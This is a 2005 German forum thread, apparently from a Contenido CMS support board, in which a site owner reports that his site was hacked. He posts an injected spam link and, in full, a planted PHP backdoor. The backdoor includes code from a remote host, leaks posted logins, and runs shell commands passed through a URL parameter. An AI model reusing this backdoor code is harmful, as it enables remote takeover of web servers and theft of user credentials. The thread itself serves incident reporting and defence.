Seite gehackt.... [Battlefield Keygen]

Gesperrt
alexpetri
Beiträge: 59
Registriert: Do 25. Mär 2004, 12:53
Kontaktdaten:
Kontaktdaten von alexpetri

Seite gehackt.... [Battlefield Keygen]

Beitrag von alexpetri » Sa 17. Dez 2005, 17:15

hab auf meiner HP im Loginbereich folgenden Fehler gefunden:

Parse error: parse error, unexpected T_STRING in /home/nordendn/public_html/contenido/contenido/includes/startup.php on line 20

Code: Alles auswählen

if (!file_exists( dirname(__FILE__) . '/config.php'))
{
$msg = "<h1>Fatal Error</h1><br><a href="http://www.tidalworks.net/Projects/battlefield_keygen.phtml" class=giepoaytr target=_blank>battlefield keygen</a>";
$msg .= "Could not open the configuration file <b>config.php</b>.<br><br>";
$msg .= "Please make sure that you saved the file in the setup program. If you had to place the file manually on your webserver, make sure that it is placed in your contenido/includes directory.";

die ($msg);
}
weis jemand was ich dagegen tun kann?
Nach oben
alexpetri
Beiträge: 59
Registriert: Do 25. Mär 2004, 12:53
Kontaktdaten:
Kontaktdaten von alexpetri

UPDATE

Beitrag von alexpetri » Sa 17. Dez 2005, 17:41

des weiteren finde ich in den Verzeichnissen
jeweis mehrere phpdateien /.htaccess Dateien mit
folgendem Inhalt

Code: Alles auswählen

<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>
Nach oben
emergence
Beiträge: 10645
Registriert: Mo 28. Jul 2003, 12:49
Wohnort: Austria
Kontaktdaten:
Kontaktdaten von emergence

Beitrag von emergence » Sa 17. Dez 2005, 17:43

auf alle fälle das hier entfernen...

Code: Alles auswählen

<a href="blabla" class=giepoaytr target=_blank>battlefield keygen</a>
den link würd ich aber nicht anklicken... da installiert sich höchstens eine spyware...
*** make your own tools (wishlist :: thx)
Nach oben
alexpetri
Beiträge: 59
Registriert: Do 25. Mär 2004, 12:53
Kontaktdaten:
Kontaktdaten von alexpetri

Beitrag von alexpetri » Mo 19. Dez 2005, 15:56

jetzt ist die Frage, ob der "Hack" über eine PHP Sicherheitslücke kam oder ob der Server nicht ordentlich abgesichert ist...
denn scheinbar bin ioch ja der Einzige dem das passiert ist.
Nach oben
Gesperrt

Zurück zu „Version 4.6“